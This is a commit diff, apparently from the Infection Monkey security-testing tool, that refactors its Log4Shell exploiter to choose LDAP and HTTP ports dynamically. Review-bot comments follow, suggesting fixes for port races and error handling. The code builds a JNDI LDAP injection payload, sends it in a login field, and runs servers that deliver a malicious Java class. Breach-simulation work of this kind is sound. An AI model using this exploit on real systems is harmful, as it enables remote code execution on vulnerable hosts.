Agent: change ldap and http ports to be chosen dynamically in log4shell
This commit is contained in:
parent
0659fddac6
commit
8a120110f5
|
@ -19,6 +19,7 @@ from infection_monkey.model import (
|
||||||
MONKEY_ARG,
|
MONKEY_ARG,
|
||||||
VictimHost,
|
VictimHost,
|
||||||
)
|
)
|
||||||
|
from infection_monkey.network.info import get_free_tcp_port
|
||||||
from infection_monkey.network.tools import get_interface_to_target
|
from infection_monkey.network.tools import get_interface_to_target
|
||||||
from infection_monkey.utils.commands import build_monkey_commandline
|
from infection_monkey.utils.commands import build_monkey_commandline
|
||||||
from infection_monkey.utils.monkey_dir import get_monkey_dir_path
|
from infection_monkey.utils.monkey_dir import get_monkey_dir_path
|
||||||
|
@ -30,13 +31,13 @@ class Log4ShellExploiter(WebRCE):
|
||||||
_TARGET_OS_TYPE = ["linux", "windows"]
|
_TARGET_OS_TYPE = ["linux", "windows"]
|
||||||
EXPLOIT_TYPE = ExploitType.VULNERABILITY
|
EXPLOIT_TYPE = ExploitType.VULNERABILITY
|
||||||
_EXPLOITED_SERVICE = "Log4j"
|
_EXPLOITED_SERVICE = "Log4j"
|
||||||
LDAP_PORT = 8080
|
|
||||||
CLASS_HTTP_SERVER_PORT = 1337
|
|
||||||
DOWNLOAD_TIMEOUT = 15
|
DOWNLOAD_TIMEOUT = 15
|
||||||
|
|
||||||
def __init__(self, host: VictimHost):
|
def __init__(self, host: VictimHost):
|
||||||
super().__init__(host)
|
super().__init__(host)
|
||||||
self._client = None
|
self._client = None
|
||||||
|
self.ldap_port = get_free_tcp_port()
|
||||||
|
self.class_http_server_port = get_free_tcp_port()
|
||||||
|
|
||||||
def exploit_host(self):
|
def exploit_host(self):
|
||||||
|
|
||||||
|
@ -53,15 +54,13 @@ class Log4ShellExploiter(WebRCE):
|
||||||
java_class = self.build_java_class(command)
|
java_class = self.build_java_class(command)
|
||||||
class_http_server_ip = get_interface_to_target(self.host.ip_addr)
|
class_http_server_ip = get_interface_to_target(self.host.ip_addr)
|
||||||
|
|
||||||
java_class_http_thread = Log4ShellExploiter.get_java_class_server_thread(
|
java_class_http_thread = self.get_java_class_server_thread(class_http_server_ip, java_class)
|
||||||
class_http_server_ip, java_class
|
|
||||||
)
|
|
||||||
java_class_http_thread.start()
|
java_class_http_thread.start()
|
||||||
|
|
||||||
ldap = LDAPExploitServer(
|
ldap = LDAPExploitServer(
|
||||||
ldap_server_port=Log4ShellExploiter.LDAP_PORT,
|
ldap_server_port=self.ldap_port,
|
||||||
http_server_ip=class_http_server_ip,
|
http_server_ip=class_http_server_ip,
|
||||||
http_server_port=self.CLASS_HTTP_SERVER_PORT,
|
http_server_port=self.class_http_server_port,
|
||||||
storage_dir=get_monkey_dir_path(),
|
storage_dir=get_monkey_dir_path(),
|
||||||
)
|
)
|
||||||
ldap_thread = ldap.get_run_thread()
|
ldap_thread = ldap.get_run_thread()
|
||||||
|
@ -86,7 +85,7 @@ class Log4ShellExploiter(WebRCE):
|
||||||
|
|
||||||
def build_ldap_payload(self):
|
def build_ldap_payload(self):
|
||||||
interface_ip = get_interface_to_target(self.host.ip_addr)
|
interface_ip = get_interface_to_target(self.host.ip_addr)
|
||||||
return f"${{jndi:ldap://{interface_ip}:{Log4ShellExploiter.LDAP_PORT}/dn=Exploit}}"
|
return f"${{jndi:ldap://{interface_ip}:{self.ldap_port}/dn=Exploit}}"
|
||||||
|
|
||||||
# TODO remove duplication with infection_monkey.exploit.hadoop.HadoopExploiter.build_command
|
# TODO remove duplication with infection_monkey.exploit.hadoop.HadoopExploiter.build_command
|
||||||
def build_command(self, path, http_path):
|
def build_command(self, path, http_path):
|
||||||
|
@ -133,20 +132,15 @@ class Log4ShellExploiter(WebRCE):
|
||||||
self.wfile.write(self.java_class)
|
self.wfile.write(self.java_class)
|
||||||
Log4ShellExploiter.HTTPHandler.class_downloaded = True
|
Log4ShellExploiter.HTTPHandler.class_downloaded = True
|
||||||
|
|
||||||
@staticmethod
|
def _run_class_http_server(self, ip):
|
||||||
def _run_class_http_server(ip):
|
server = http.server.HTTPServer((ip, self.class_http_server_port), Log4ShellExploiter.HTTPHandler)
|
||||||
|
|
||||||
server = http.server.HTTPServer(
|
|
||||||
(ip, Log4ShellExploiter.CLASS_HTTP_SERVER_PORT), Log4ShellExploiter.HTTPHandler
|
|
||||||
)
|
|
||||||
while (
|
while (
|
||||||
not Log4ShellExploiter.HTTPHandler.class_downloaded
|
not Log4ShellExploiter.HTTPHandler.class_downloaded
|
||||||
and not Log4ShellExploiter.HTTPHandler.stop
|
and not Log4ShellExploiter.HTTPHandler.stop
|
||||||
):
|
):
|
||||||
server.handle_request()
|
server.handle_request()
|
||||||
|
|
||||||
@staticmethod
|
def get_java_class_server_thread(self, ip: str, java_class: bytes):
|
||||||
def get_java_class_server_thread(ip: str, java_class: bytes):
|
|
||||||
Log4ShellExploiter.HTTPHandler.java_class = java_class
|
Log4ShellExploiter.HTTPHandler.java_class = java_class
|
||||||
|
|
||||||
return Thread(target=Log4ShellExploiter._run_class_http_server, args=[ip])
|
return Thread(target=self._run_class_http_server, args=[ip])
|
||||||
|
|
|
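Review bot: The ports taken from `get_free_tcp_port()` in `__init__` are chosen long before anything binds them, so by the time `http.server.HTTPServer((ip, self.class_http_server_port), ...)` and `LDAPExploitServer(ldap_server_port=self.ldap_port, ...)` run in `exploit_host` another process may own the port; the bind then raises `OSError` inside the server thread while the payload built from `self.ldap_port` still advertises the dead port, and if the helper only probes rather than reserves (its implementation is not visible here, so treat this as to-be-confirmed) the two back-to-back calls can even return the same number. For the class server the race disappears if `get_java_class_server_thread` binds to port 0 and writes the kernel-assigned port back into `self.class_http_server_port` before `LDAPExploitServer` is constructed, which `exploit_host` already does in that order; the LDAP side needs the equivalent inside `LDAPExploitServer`. The server is also never closed once the `while` loop exits, so the listening socket and its port linger until garbage collection; `server.server_close()` after the loop fixes that. Note that `HTTPHandler.class_downloaded`, `stop` and `java_class` stay class-level on `Log4ShellExploiter.HTTPHandler`, so two exploiter instances still share that state even though the ports are now per-instance.
```python
    def _run_class_http_server(self, server: http.server.HTTPServer):
        # Serve until the class is fetched or stop is requested, then release the port.
        while (
            not Log4ShellExploiter.HTTPHandler.class_downloaded
            and not Log4ShellExploiter.HTTPHandler.stop
        ):
            server.handle_request()
        server.server_close()

    def get_java_class_server_thread(self, ip: str, java_class: bytes):
        Log4ShellExploiter.HTTPHandler.java_class = java_class
        # Bind now on port 0 so the kernel picks and holds a free port; the value
        # probed in __init__ may have been taken in the meantime.
        server = http.server.HTTPServer((ip, 0), Log4ShellExploiter.HTTPHandler)
        self.class_http_server_port = server.server_address[1]
        return Thread(target=self._run_class_http_server, args=[server])
```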
@ -13,9 +13,9 @@ def trigger_exploit(payload: str, host: VictimHost, open_ports: List[int]):
|
||||||
payload = {"uname": payload, "password": "m0nk3y"}
|
payload = {"uname": payload, "password": "m0nk3y"}
|
||||||
for url in urls:
|
for url in urls:
|
||||||
try:
|
try:
|
||||||
requests.post(url, data=payload, timeout=5, verify=False) # noqa DUO123
|
resp = requests.post(url, data=payload, timeout=5, verify=False) # noqa DUO123
|
||||||
except requests.ReadTimeout:
|
except requests.ReadTimeout as e:
|
||||||
logger.debug("Couldn't send request to the vulnerable machine")
|
logger.debug(f"Log4shell request failed {e}")
|
||||||
|
|
||||||
|
|
||||||
def build_urls(open_ports: List[int], host: VictimHost) -> List[str]:
|
def build_urls(open_ports: List[int], host: VictimHost) -> List[str]:
|
||||||
|
|
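Review bot: The handler at `except requests.ReadTimeout as e:` still catches only read timeouts, so a `requests.ConnectionError` or `ConnectTimeout` on one URL propagates out of `trigger_exploit` and the remaining entries in `urls` are never tried; `except requests.RequestException as e:` keeps the same log line and covers all of them. `resp` is assigned on the new `requests.post` line but not used anywhere in the hunk, so either drop the assignment or log `resp.status_code` so the debug output shows whether the request reached the target. The log call should use lazy formatting, `logger.debug("Log4shell request failed: %s", e)`, rather than an f-string. `trigger_exploit` begins before this hunk and `build_urls` continues past it.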